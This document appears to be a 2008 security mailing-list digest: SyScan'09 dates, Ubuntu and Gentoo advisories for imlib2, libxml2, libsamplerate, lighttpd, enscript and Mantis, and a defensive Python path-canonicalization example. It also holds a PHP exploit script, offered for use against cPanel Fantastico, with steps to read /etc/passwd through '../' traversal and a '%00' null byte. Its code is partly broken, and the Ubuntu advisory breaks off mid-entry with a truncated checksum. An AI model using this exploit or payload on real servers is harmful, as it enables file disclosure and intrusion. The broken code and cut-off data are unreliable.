Dates for SyScan'09
Dear all,

There will be 4 SyScan'09 conferences next year in 4 different exciting countries in Asia. They are as follows:

SyScan'09 Shanghai: 14th and 15th May 2009
SyScan'09 Hong Kong: 19th and 20th May 2009
SyScan'09 Singapore: 2nd and 3rd July 2009
SyScan'09 Taiwan: 7th and 8th July 2009

Do keep a lookout for more information at www.syscan.org. We will be announcing the CFP very soon.

--
Thank you
Thomas Lim
Organiser
SyScan'08
www.syscan.org
Re: /bin/login gives root to group utmp
I'm glad you finally seemed to make the 'bug' fixing team of Debian aware of security issues. I'm just glad I personally haven't seen this much scrutiny from the security team, or my faith in Debian maintainers in all areas would significantly drop even more. Nice find.
Cpanel fantastico Privilege Escalation ModSec and PHP restriction Bypass
Script : Cpanel 11.x
bug : language.php [edit file]
exploit = Cpanel fantastico Privilege Escalation ModSec and PHP restriction Bypass
safemode off, mod_security off
Disable functions : All NONE, access root folder

    <?php
    /*
    # Deadly Script by Super-Crystal
    # bypass Cpanel fantastico
    # www.arab4services.net
    ### e-mail : [EMAIL PROTECTED] , [EMAIL PROTECTED] ###
    */
    set_time_limit(0);
    if(isset($_POST['sup3r'])) {
        if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
            $phpwrapper = '<?php include_once("./language/".$_GET["sup3r"].".php"); ?>';
            fwrite($h,$prctl);
            fclose($h);
            $handle = fopen($_POST['php'], "w");
            fwrite($handle, $phpwrapper);
            fclose($handle);
            echo "Building exploit...<br />";
            echo "coding by Super-Crystal <br />";
            echo "Cleaning up<br />";
            echo "Done!<br /></pre>";
        } else {
            echo "error : ".php_uname();
        }
    } else {
    ?>
    <div align=center>
    <h3>Deadly Script</h3>
    <font color=red>Cpanel fantastico Privilege Escalation ModSec and PHP restriction Bypass</font><br />
    <pre><div align=center></pre></div><br />
    <table border=0 cellspacing=0>
    <tr>
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method=post>
    <table border=0 cellspacing=0>
    <tr>
    <td><div align=right>Exploit:</div></td>
    <td>
    <select name=exploit>
    <option selected=selected>Cpanel fantastico Privilege Escalation ModSec and PHP restriction Bypass</option>
    </select>
    </td>
    </tr>
    <tr>
    <td><div align=right>change</div></td>
    <td><input type=text name=php size=50 value="<?php echo getcwd()."/language.php" ?>" /></td>
    </tr>
    <tr>
    </table>
    </div>
    <input type=hidden name=sup3r value=doit />
    <input name=submit type=submit value=Submit /><br />
    1- change /home/[user]/.fantasticodata/language.php <br />
    2- click on the submit <br />
    3- now put it like this (e.g) : http://www..com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 . <br />
    <font color=red>Written: 10.10.2008</font><br />
    <font color=blue>Public: 26.11.2008</font><br />
    <div align=center>
    <font color=red>Author : Super-Crystal</font><br />
    <a href="http://www.arab4services.net">Arab4services.net </a></center>
    </div>
    </form>
    <?php
    }
    ?>

arab4services.net
[USN-683-1] Imlib2 vulnerability
===========================================================
Ubuntu Security Notice USN-683-1             December 02, 2008
imlib2 vulnerability
CVE-2008-5187
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libimlib2                       1.2.1-2ubuntu0.3

Ubuntu 7.10:
  libimlib2                       1.3.0.0debian1-4ubuntu0.1

Ubuntu 8.04 LTS:
  libimlib2                       1.4.0-1ubuntu1.1

Ubuntu 8.10:
  libimlib2                       1.4.0-1.1ubuntu1.1

After a standard system upgrade you need to restart any applications
that use Imlib2 to effect the necessary changes.

Details follow:

It was discovered that Imlib2 did not correctly handle certain malformed
XPM images. If a user were tricked into opening a specially crafted image
with an application that uses Imlib2, an attacker could cause a denial of
service and possibly execute arbitrary code with the user's privileges.

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.diff.gz
      Size/MD5:   111655 1db5e38ae075ba7879e2379de336fa60
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.dsc
      Size/MD5:      753 d207af283f3356525dd8bf1863b18dde
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1.orig.tar.gz
      Size/MD5:   911360 deb3c9713339fe9ca964e100cce42cd1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_amd64.deb
      Size/MD5:   352032 ca8a615db5f3fe5f9d9e7be5bc6e5251
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_amd64.deb
      Size/MD5:   214630 575972ea6305a67fb7dba4a9767bd738

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_i386.deb
      Size/MD5:   302506 558d3ca8288047f906d0abe64cacff0a
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_i386.deb
      Size/MD5:   193346 8814a94983cb3dc69c8751f8ffb0c0a7

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_powerpc.deb
      Size/MD5:   341950 42cd29c55636cf54b595d40a1d8da334
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_powerpc.deb
      Size/MD5:   212852 aebcc16c8a0f26d97ff9b8853bc96344

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_sparc.deb
      Size/MD5:   318490 f96156937b2ac3fddfef13feab5c317b
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_sparc.deb
      Size/MD5:   194030 74b17b7473671d6bce17168e3a93892e

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.diff.gz
      Size/MD5:    13311 8aace634a15651f892a707288bb06d80
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.dsc
      Size/MD5:      873 b0131ffc8e50111ef870a805d74b5603
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1.orig.tar.gz
      Size/MD5:   617750 7f389463afdb09310fa61e5036714bb3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_amd64.deb
      Size/MD5:   365864 03137784605c2957899f2e3ea98c7abb
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_amd64.deb
      Size/MD5:   213966 04d1d6d16c95ef15d400b69f946ef465

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_i386.deb
      Size/MD5:   334386 8964c1cf0d89fce685e45c275fe9b398
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_i386.deb
      Size/MD5:   205672 7eda0e69c39446878a3604fcfa2bd100

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_lpia.deb
      Size/MD5:   341396 c566cf2c1190d50307518180ecbaf1f8
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_lpia.deb
      Size/MD5:   209212 cbdccce66f76e6811562e07c69b1

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_powerpc.deb
      Size/MD5:   362434
[ GLSA 200812-06 ] libxml2: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                        Gentoo Linux Security Advisory           GLSA 200812-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libxml2: Multiple vulnerabilities
      Date: December 02, 2008
      Bugs: #234099, #237806, #239346, #245960
        ID: 200812-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in libxml2 might lead to execution of arbitrary
code or Denial of Service.

Background
==========

libxml2 is the XML (eXtended Markup Language) C parser and toolkit
initially developed for the Gnome project.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-libs/libxml2        < 2.7.2-r1                     >= 2.7.2-r1

Description
===========

Multiple vulnerabilities were reported in libxml2:

* Andreas Solberg reported that libxml2 does not properly detect
  recursion during entity expansion in an attribute value
  (CVE-2008-3281).

* A heap-based buffer overflow has been reported in the
  xmlParseAttValueComplex() function in parser.c (CVE-2008-3529).

* Christian Weiske reported that predefined entity definitions in
  entities are not properly handled (CVE-2008-4409).

* Drew Yao of Apple Product Security reported an integer overflow in
  the xmlBufferResize() function that can lead to an infinite loop
  (CVE-2008-4225).

* Drew Yao of Apple Product Security reported an integer overflow in
  the xmlSAX2Characters() function leading to a memory corruption
  (CVE-2008-4226).

Impact
======

A remote attacker could entice a user or automated system to open a
specially crafted XML document with an application using libxml2,
possibly resulting in the execution of arbitrary code or a high CPU and
memory consumption.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libxml2 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.2-r1"

References
==========

  [ 1 ] CVE-2008-3281
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281
  [ 2 ] CVE-2008-3529
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529
  [ 3 ] CVE-2008-4409
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409
  [ 4 ] CVE-2008-4225
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225
  [ 5 ] CVE-2008-4226
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200812-05 ] libsamplerate: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                        Gentoo Linux Security Advisory           GLSA 200812-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libsamplerate: User-assisted execution of arbitrary code
      Date: December 02, 2008
      Bugs: #237037
        ID: 200812-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow vulnerability in libsamplerate might lead to the
execution of arbitrary code.

Background
==========

Secret Rabbit Code (aka libsamplerate) is a Sample Rate Converter for
audio.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  media-libs/libsamplerate        < 0.1.4                   >= 0.1.4

Description
===========

Russell O'Connor reported a buffer overflow in src/src_sinc.c related
to low conversion ratios.

Impact
======

A remote attacker could entice a user or automated system to process a
specially crafted audio file, possibly leading to the execution of
arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libsamplerate users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot -v ">=media-libs/libsamplerate-0.1.4"

References
==========

  [ 1 ] CVE-2008-5008
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200812-04 ] lighttpd: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                        Gentoo Linux Security Advisory           GLSA 200812-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: lighttpd: Multiple vulnerabilities
      Date: December 02, 2008
      Bugs: #238180
        ID: 200812-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in lighttpd may lead to information disclosure
or a Denial of Service.

Background
==========

lighttpd is a lightweight high-performance web server.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  www-servers/lighttpd       < 1.4.20                      >= 1.4.20

Description
===========

Multiple vulnerabilities have been reported in lighttpd:

* Qhy reported a memory leak in the http_request_parse() function in
  request.c (CVE-2008-4298).

* Gaetan Bisson reported that URIs are not decoded before applying
  url.redirect and url.rewrite rules (CVE-2008-4359).

* Anders1 reported that mod_userdir performs case-sensitive
  comparisons on filename components in configuration options, which
  is insufficient when case-insensitive filesystems are used
  (CVE-2008-4360).

Impact
======

A remote attacker could exploit these vulnerabilities to cause a Denial
of Service, to bypass intended access restrictions, to obtain sensitive
information, or to possibly modify data.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All lighttpd users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/lighttpd-1.4.20"

References
==========

  [ 1 ] CVE-2008-4298
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4298
  [ 2 ] CVE-2008-4359
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4359
  [ 3 ] CVE-2008-4360
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4360

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
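Two of the lighttpd issues above share one root cause: a rule that looks at the request path before that path has been put into canonical form. If url.redirect or url.rewrite rules are matched against the still-encoded URI (CVE-2008-4359), an encoded or non-canonical spelling of a protected path does not match the rule yet still reaches the same resource; if mod_userdir compares filename components case-sensitively on a case-insensitive filesystem (CVE-2008-4360), "Admin" and "admin" pass different checks while naming the same file. The Python script below is an added illustration of the defensive pattern, not lighttpd code and not part of the advisory: it canonicalizes a path (repeated percent-decoding, NUL rejection, slash and dot-segment normalization, optional case folding) before applying a deny rule, and shows side by side which sample requests a rule on the raw path misses. The deny rule, the helper names and the sample request paths are constructed for this example.

```python
"""Canonicalize a request path before applying access rules.

Added example, not part of lighttpd or of the advisory. The deny rule,
the helper names and the sample request paths below are constructed
for illustration.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed rule: anything at or below /admin must be refused.
DENY_PREFIX = "/admin"


def canonicalize(raw_path: str, case_insensitive_fs: bool = False) -> str:
    """Return the normalized form of a request path.

    Steps: drop the query string, percent-decode until the result is
    stable (so double encoding is resolved too), reject embedded NUL
    bytes, collapse repeated slashes, resolve '.' and '..' segments and,
    on a case-insensitive filesystem, fold case so that 'Admin' and
    'admin' name the same resource.
    """
    path = raw_path.split("?", 1)[0]
    previous = None
    while previous != path:
        previous = path
        path = unquote(path)
    if "\x00" in path:
        raise ValueError("embedded NUL byte in path")
    path = re.sub(r"/+", "/", path)
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    if case_insensitive_fs:
        path = path.lower()
    return path


def naive_denied(raw_path: str) -> bool:
    """Rule evaluated on the raw URI, the way a server that skips decoding would."""
    return raw_path.startswith(DENY_PREFIX)


def hardened_denied(raw_path: str, case_insensitive_fs: bool = False) -> bool:
    """Rule evaluated on the canonical path; malformed paths are refused outright."""
    try:
        path = canonicalize(raw_path, case_insensitive_fs)
    except ValueError:
        return True
    return path == DENY_PREFIX or path.startswith(DENY_PREFIX + "/")


# Constructed sample requests: different spellings of the same protected path.
SAMPLE_REQUESTS = [
    "/admin/config",             # plain
    "/%61dmin/config",           # percent-encoded 'a'
    "/%2561dmin/config",         # double-encoded 'a'
    "/public/../admin/config",   # dot segment
    "//admin/config",            # duplicate slash
    "/Admin/config",             # case variant, matters on case-insensitive fs
    "/admin%00.png",             # NUL byte after the protected name
    "/index.html",               # benign request
]


def audit(requests, case_insensitive_fs: bool = False):
    """Map each raw path to (naive verdict, hardened verdict)."""
    return {r: (naive_denied(r), hardened_denied(r, case_insensitive_fs))
            for r in requests}


if __name__ == "__main__":
    for raw, (naive, hardened) in audit(SAMPLE_REQUESTS, case_insensitive_fs=True).items():
        print(f"{raw:28} naive={naive!s:5} hardened={hardened}")
```

The `audit()` table is the part worth reading: every row except the benign one should come back denied by the hardened rule, while the naive rule only catches the spellings that happen to start with the literal prefix. The `case_insensitive_fs` flag is what the mod_userdir issue turns on; without it, `/Admin/config` is correctly treated as a different resource on a case-sensitive filesystem.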
[ GLSA 200812-02 ] enscript: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                        Gentoo Linux Security Advisory           GLSA 200812-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: enscript: User-assisted execution of arbitrary code
      Date: December 02, 2008
      Bugs: #243228
        ID: 200812-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two buffer overflows in enscript might lead to the execution of
arbitrary code.

Background
==========

enscript is a powerful ASCII to PostScript file converter.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-text/enscript       < 1.6.4-r4                     >= 1.6.4-r4

Description
===========

Two stack-based buffer overflows in the read_special_escape() function
in src/psgen.c have been reported. Ulf Harnhammar of Secunia Research
discovered a vulnerability related to the setfilename command
(CVE-2008-3863), and Kees Cook of Ubuntu discovered a vulnerability
related to the font escape sequence (CVE-2008-4306).

Impact
======

An attacker could entice a user or automated system to process
specially crafted input with the special escapes processing enabled
using the -e option, possibly resulting in the execution of arbitrary
code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All enscript users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/enscript-1.6.4-r4"

References
==========

  [ 1 ] CVE-2008-3863
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3863
  [ 2 ] CVE-2008-4306
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4306

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200812-07 ] Mantis: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                        Gentoo Linux Security Advisory           GLSA 200812-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Mantis: Multiple vulnerabilities
      Date: December 02, 2008
      Bugs: #238570, #241940, #242722
        ID: 200812-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in Mantis, the most severe
of which leads to the remote execution of arbitrary code.

Background
==========

Mantis is a PHP/MySQL/Web based bugtracking system.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-apps/mantisbt       < 1.1.4-r1                     >= 1.1.4-r1

Description
===========

Multiple issues have been reported in Mantis:

* EgiX reported that manage_proj_page.php does not correctly sanitize
  the sort parameter before passing it to create_function() in
  core/utility_api.php (CVE-2008-4687).

* Privileges of viewers are not sufficiently checked before composing
  a link with issue data in the source anchor (CVE-2008-4688).

* Mantis does not unset the session cookie during logout
  (CVE-2008-4689).

* Mantis does not set the secure flag for the session cookie in an
  HTTPS session (CVE-2008-3102).

Impact
======

Remote unauthenticated attackers could exploit these vulnerabilities to
execute arbitrary PHP commands, disclose sensitive issue data, or hijack
a user's sessions.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mantis users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/mantisbt-1.1.4-r1"

References
==========

  [ 1 ] CVE-2008-3102
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3102
  [ 2 ] CVE-2008-4687
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4687
  [ 3 ] CVE-2008-4688
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4688
  [ 4 ] CVE-2008-4689
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4689

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5